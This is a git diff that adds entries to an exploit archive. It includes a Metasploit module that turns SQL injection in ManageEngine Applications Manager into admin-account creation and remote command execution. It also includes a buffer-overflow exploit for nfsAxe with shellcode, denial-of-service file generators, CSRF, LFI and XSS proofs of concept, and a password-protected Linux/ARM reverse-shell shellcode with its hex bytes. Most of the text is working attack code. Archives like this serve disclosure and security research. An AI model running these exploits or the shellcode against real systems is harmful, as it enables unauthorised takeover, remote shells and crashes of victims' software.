diff --git a/exploits/hardware/dos/46733.py b/exploits/hardware/dos/46733.py new file mode 100755 index 000000000..3b700a247 --- /dev/null +++ b/exploits/hardware/dos/46733.py @@ -0,0 +1,29 @@ +#!/usr/bin/python +# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS +# Date: 19/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.qnap.com +# Version: 1.3.4.0317 and below are vulnerable +# Software Link: https://www.qnap.com/en/utilities/essentials +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP/7/10 (version 1.3.3.0925) +# CVE: CVE-2019-7181 +# POC +# 1.) Generate qnap.txt +# 2.) Copy the contents of qnap.txt to the clipboard +# 3.) Paste the contents in any username/password field(Add or Edit VPN) +# 4.) Click ok, program crashes. +# This vulnerability was responsibly disclosed February 3, 2019, new version has been released. + +buffer = "A" * 1000 + +payload = buffer +try: + f=open("qnap.txt","w") + print "[+] Creating %s bytes QNAP payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/multiple/dos/46735.html b/exploits/multiple/dos/46735.html new file mode 100644 index 000000000..66a6f92d8 --- /dev/null +++ b/exploits/multiple/dos/46735.html @@ -0,0 +1,47 @@ + + + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/remote/46740.rb b/exploits/multiple/remote/46740.rb new file mode 100755 index 000000000..f1ea72b9a --- /dev/null +++ b/exploits/multiple/remote/46740.rb @@ -0,0 +1,313 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution", + 'Description' => %q( + This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions. + It is completely different from the previous EDB-ID:46725 exploit. + + Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass. + Therefore an unauthenticated user can gain the authority of "system" on the server. + It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account. + + Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL) + Applications Manager 14 on Windows 10 64-bit (MSSQL) + Applications Manager 14 on Windows 10 64-bit (PostgreSQL) + Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL) + Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL) + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus + ], + 'References' => + [ + [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 60, # countermeasure + 'RPORT' => 8443, + 'SSL' => true + }, + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['unix', 'win', 'linux'], + 'Targets' => + [ + [ 'Windows Target', + { + 'Platform' => ['win'], + 'Arch' => ARCH_CMD, + } + ], + [ 'Linux Target', + { + 'Platform' => ['unix','linux'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby python', + } + } + } + ] + ], + 'DisclosureDate' => '22 April 2019', + 'DefaultTarget' => 1)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of ME', '/']) + ],self.class) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def exec(action) + # operation of malicious file. The end of the adventure :( + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'method' => 'testAction', + 'actionID' => action, + 'haid' => 'null' + } + ) + end +## +# platform check +## + def check_platform + # First touch to support of execute program ;) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'showTile.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'TileName' => '.ExecProg', + 'haid' => 'null', + } + ) + if res && res.code == 200 && res.body.include?('createExecProgAction') + # Platform can be discovered precisely using an application dir. + @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later + if @dir =~ /:/ + platform = Msf::Module::Platform::Windows + else + platform = Msf::Module::Platform::Unix + end + else + fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.') + end + file_up(platform, @dir) + end +## +# Creating and sending malicious files +## + def file_up(platform, dir) + # specifying an extension by platform + if platform == Msf::Module::Platform::Windows + filex = ".bat" + else + if payload.encoded =~ /sh/ + filex = ".sh" + elsif payload.encoded =~ /perl/ + filex = ".pl" + elsif payload.encoded =~ /python/ + filex = ".py" + elsif payload.encoded =~ /ruby/ + filex = ".rb" + else + fail_with(Failure::Unknown, 'Payload type could not be checked!') + end + end + + @fname= rand_text_alpha(9 + rand(3)) + filex + data = Rex::MIME::Message.new + data.add_part('./', nil, nil, 'form-data; name="uploadDir"') + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"") + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data.to_s, + 'agent' => 'Mozilla', + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri, "Upload.do") + }) + + if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control + print_good("#{@fname} malicious file has been uploaded.") + create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O + else + fail_with(Failure::Unknown, 'The file could not be uploaded!') + end + end + + def create_exec_prog(dir, fname) + + @display = rand_text_alphanumeric(7) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'adminAction.do'), + 'cookie' => @cookie, + 'vars_post' => { + 'actions' => '/showTile.do?TileName=.ExecProg&haid=null', + 'method' => 'createExecProgAction', + 'id' => 0, + 'displayname' => @display, + 'serversite' => 'local', + 'choosehost' => -2, + 'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o + 'command' => fname, + 'execProgExecDir' => dir, + 'cancel' => 'false' + } + ) + + if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control + # Find actionID simply from body res + actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] + print_status("Transactions completed. Attempting to get a session...") + exec(actionid) + else + fail_with(Failure::Unreachable, 'Connection error occurred!') + end + + end +## +# Check all +## + def check + # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both. + # The platform can be linux and possible remotely connected to the MSSQL database. + # In the same way platform can be windows and postgresql can be used. + # Thats why we are sending two queries. We will check the platform inside. + @uname = Rex::Text.rand_text_alpha_lower(6) + uid = rand_text_numeric(3) + apk = rand_text_numeric(6) + @pwd = rand_text_alphanumeric(8+rand(9)) + # MSSQL injection should be prepared with ASCII characters. + # Map and join can be used for this. + @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}" + @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}" + @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}" + @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random + # PostgreSQL injection query // no need APIKEY + pg_user ="" + pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+" + pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);" + pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+" + # MSSQL injection query + ms_user ="" + ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR}," + ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});" + ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--" + # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln.. + use_sqli(ms_user, pg_user) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'applications.do'), + ) + # If the user we sent with queries was created, the login will be successful with new admin user. + if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English. + @cookie = res.get_cookies + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'j_security_check'), + 'cookie' => @cookie, + 'vars_post' => { + 'clienttype' => 'html', + 'j_username' => @uname, + 'j_password' => @pwd + } + ) + + if res && res.code == 302 && res.body.include?('Redirecting to') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'applications.do'), + 'cookie' => @cookie + ) + @cookie = res.get_cookies # last cookie + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + else + return Exploit::CheckCode::Safe + end + + end + + def exploit + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + print_good("Excellent! Logged in as #{@uname}") + print_status("Admin Username => #{@uname}") + print_status("Admin Password => #{@pwd}") + check_platform # Start the adventure + end +## +# Communication with the database +## + def use_sqli(mssql, postgresql) + # two different post data must be sent. + # Because the query structures are different. + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'), + 'vars_post' => { + 'resourceid' => mssql + } + ) + # important to send the +/$ characters clear + send_request_cgi( + { + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'), + 'data' => "resourceid=#{postgresql}" + }, 25) + + end +end +## +# The end of the codes (o_O) // AkkuS +## \ No newline at end of file diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt new file mode 100644 index 000000000..98e9740d7 --- /dev/null +++ b/exploits/php/webapps/46734.txt @@ -0,0 +1,48 @@ +# Exploit Title: Contact Form Builder [CSRF → LFI] +# Date: 2019-03-17 +# Exploit Author: Panagiotis Vagenas +# Vendor Homepage: http://web-dorado.com/ +# Software Link: https://wordpress.org/plugins/contact-form-builder +# Version: 1.0.67 +# Tested on: WordPress 5.1.1 + +Description +----------- + +Plugin implements the following AJAX actions: + +- `ContactFormMakerPreview` +- `ContactFormmakerwdcaptcha` +- `nopriv_ContactFormmakerwdcaptcha` +- `CFMShortcode` + +All of them call the function `contact_form_maker_ajax`. This function +dynamicaly loads a file defined in `$_GET['action']` or +`$_POST['action']` if the former is not defined. Because of the way +WordPress defines the AJAX action a user could define the plugin action +in the `$_GET['action']` and AJAX action in `$_POST['action']`. +Leveraging that and the fact that no sanitization is performed on the +`$_GET['action']`, a malicious actor can perform a CSRF attack to load a +file using directory traversal thus leading to Local File Inclusion +vulnerability. + +PoC +--- + +```html +
+    +    +
+``` \ No newline at end of file diff --git a/exploits/php/webapps/46738.html b/exploits/php/webapps/46738.html new file mode 100644 index 000000000..31133a1de --- /dev/null +++ b/exploits/php/webapps/46738.html @@ -0,0 +1,55 @@ +# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user +# Date: 2019-04-14 +# Exploit Author: ax8 +# Vendor Homepage: https://github.com/Li-Siyuan +# Software Link: http://www.74cms.com/download/index.html +# Version: v5.0.1 +# CVE : CVE-2019-11374 + + + +74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI. + + + + + + + + + + + + CSRF Proof + + + + + + + +
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/46739.html b/exploits/php/webapps/46739.html new file mode 100644 index 000000000..b19234bae --- /dev/null +++ b/exploits/php/webapps/46739.html @@ -0,0 +1,68 @@ +# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information + +# Date: 2019-04-14 +# Exploit Author: ax8 +# Vendor Homepage: https://github.com/Li-Siyuan +# Software Link: https://www.msvodx.com/ +# Version: v10 +# CVE : CVE-2019-11375 + + + +Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI. + + + + + + + + + + + + CSRF Proof + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + +
+ + + + + +MISC:http://www.iwantacve.cn/index.php/archives/198/ \ No newline at end of file diff --git a/exploits/php/webapps/46741.txt b/exploits/php/webapps/46741.txt new file mode 100644 index 000000000..ce87cd90c --- /dev/null +++ b/exploits/php/webapps/46741.txt @@ -0,0 +1,43 @@ +# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting +# Google Dork: intext:"by UliCMS" +# Exploit Author: Kağan EĞLENCE +# Vendor Homepage: https://en.ulicms.de/ +# Version: 2019.2 , 2019.1 +# CVE : CVE-2019-11398 + +### Vulnerability 1 + +Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) +Vulnerable File : /ulicms/admin/inc/loginform.php +Request Type: GET +Vulnerable Parameter : "go" +Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1) + +Result : + +### Vulnerability 2 + +Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1) +Vulnerable File : /ulicms/admin/inc/registerform.php +Request Type: GET +Vulnerable Parameter : "go" +Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1) + +Result : + +### Vulnerability 3 - Authenticated + +Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E +Request Type: GET +Vulnerable Parameter : "error" +Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E + +### History +============= +2019-04-13 Issue discovered +2019-04-13 Vendor contacted +2019-04-13 Vendor response and hotfix +2019-04-14 Vendor releases fixed versions +2019-04-22 Advisory release \ No newline at end of file diff --git a/exploits/windows/dos/46732.py b/exploits/windows/dos/46732.py new file mode 100755 index 000000000..906aad363 --- /dev/null +++ b/exploits/windows/dos/46732.py @@ -0,0 +1,28 @@ +# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit +# Date: 19.04.19 +# Vendor Homepage:http://www.audiotool.net/download.htm +# Software Link: http://www.audiotool.net/download/audioconverter.exe +# Exploit Author: Achilles +# Tested Version: 5.30 +# Tested on: Windows 7 x64 Sp1 + +# 1.- Run the python script, it will create a new file with the name "Evil.mp4" +# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter +# 3.- Load the file "Evil.mp4" +# 4.- Click ok +# 5.- Click Gut +# 5.- And you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.mp4","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46737.py b/exploits/windows/local/46737.py new file mode 100755 index 000000000..b72835fea --- /dev/null +++ b/exploits/windows/local/46737.py @@ -0,0 +1,36 @@ +#!/usr/bin/python +# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla) +# Date: 20-04-2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: http://www.labf.com/nfsaxe +# Version: 3.7 +# Software Link : http://www.labf.com/download/nfsaxe.exe +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP SP3 ENG x86 +# CVE: TBC from Mitre +# PoC: +# 1.) Generate nfsaxeping.txt, copy the contents to clipboard. +# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok. +# 3.) Click Start and calc pops +#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll) +#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes) + +shellcode = ("\x31\xC9" + "\x51" + "\x68\x63\x61\x6C\x63" + "\x54" + "\xB8\xC7\x93\xC2\x77" + "\xFF\xD0") + +buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16) + +payload = buffer +try: + f=open("nfsaxeping.txt","w") + print "[+] Creating %s bytes ping payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ac809f009..17aa7409c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6392,6 +6392,9 @@ id,file,description,date,author,type,platform,port 46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple, 46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple, 46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple, +46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows, +46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware, +46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10429,6 +10432,7 @@ id,file,description,date,author,type,platform,port 46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows, 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple, 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux, +46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17346,6 +17350,7 @@ id,file,description,date,author,type,platform,port 46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110 46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows, 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple, +46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41166,3 +41171,7 @@ id,file,description,date,author,type,platform,port 46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80 46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows, 46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows, +46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80 +46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80 +46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80 +46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 50c4f5635..a03003442 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -957,3 +957,4 @@ id,file,description,date,author,type,platform 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86 +46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm diff --git a/shellcodes/arm/46736.txt b/shellcodes/arm/46736.txt new file mode 100644 index 000000000..02843cc85 --- /dev/null +++ b/shellcodes/arm/46736.txt @@ -0,0 +1,100 @@ +/* +* Title: Linux/ARM - Password-Protected Reverse TCP Shell +* Date: 2019-04-20 +* Tested: armv6 (32-bit Raspberry Pi I) +* Author: Alan Vivona - @syscall59 - medium.syscall59.com +* Size: 100 bytes +* No null bytes / Null-free +*/ + +.section .text +.global _start +_start: + +.arm + add r3, pc, #1 // switch to thumb mode + bx r3 + +.thumb + +// [281] socket(2, 1, 0) + mov r0, #2 + mov r1, #1 + eor r2, r2 + mov r7, #200 + add r7, #81 + svc #1 +mov r10, r0 // save sockfd into r10 + +// [283] connect(socketfd, target, addrlen) + // socket fd is in r0 already + adr r1, target + strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00 + strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0 + strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0 + mov r2, #16 + add r7, #2 // 281 + 2 = 283 + svc #1 + +// [003] read(sourcefd, destbuffer, amount) + push {r1} + mov r1, sp + mov r2, #4 + mov r7, #3 + read_pass: + mov r0, r10 + svc #1 + check_pass: + ldr r3, pass + ldr r4, [r1] + eor r3, r3, r4 + bne read_pass + +// [063] dup2(sockfd, stdIO) + mov r1, #2 // r1 = 2 (stderr) + mov r7, #63 // r7 = 63 (dup2) + loop_stdio: + mov r0, r10 // r0 = saved sockfd + svc #1 + sub r1,#1 + bpl loop_stdio // loop while r3 >= 0 + +// [011] execve(command, 0, 0) + adr r0, command + eor r2, r2 + eor r1, r1 + strb r2, [r0, #7] + mov r7, #11 + svc #1 + +// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte) +// align_bytes : .byte 0xff, 0xff + +target: + // The 0xff will be replaced with a null on runtime + .ascii "\x02\xff" // Protocol: IPv4/TCP. + + .ascii "\x11\x5c" // Port : 4444 + + // The '255' will be replaced with a 0 on runtime + .byte 127,255,255,1 // IP: 127.0.0.1. + +command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime + +pass: .ascii "S59!" + + +/* + Compile, link & extract: + + as ARM-reverse-shell.s -o ARM-reverse-shell.o + ld -N ARM-reverse-shell.o -o ARM-reverse-shell + objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump + hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump + + \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a + \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b + \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2 + \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21 + +*/ \ No newline at end of file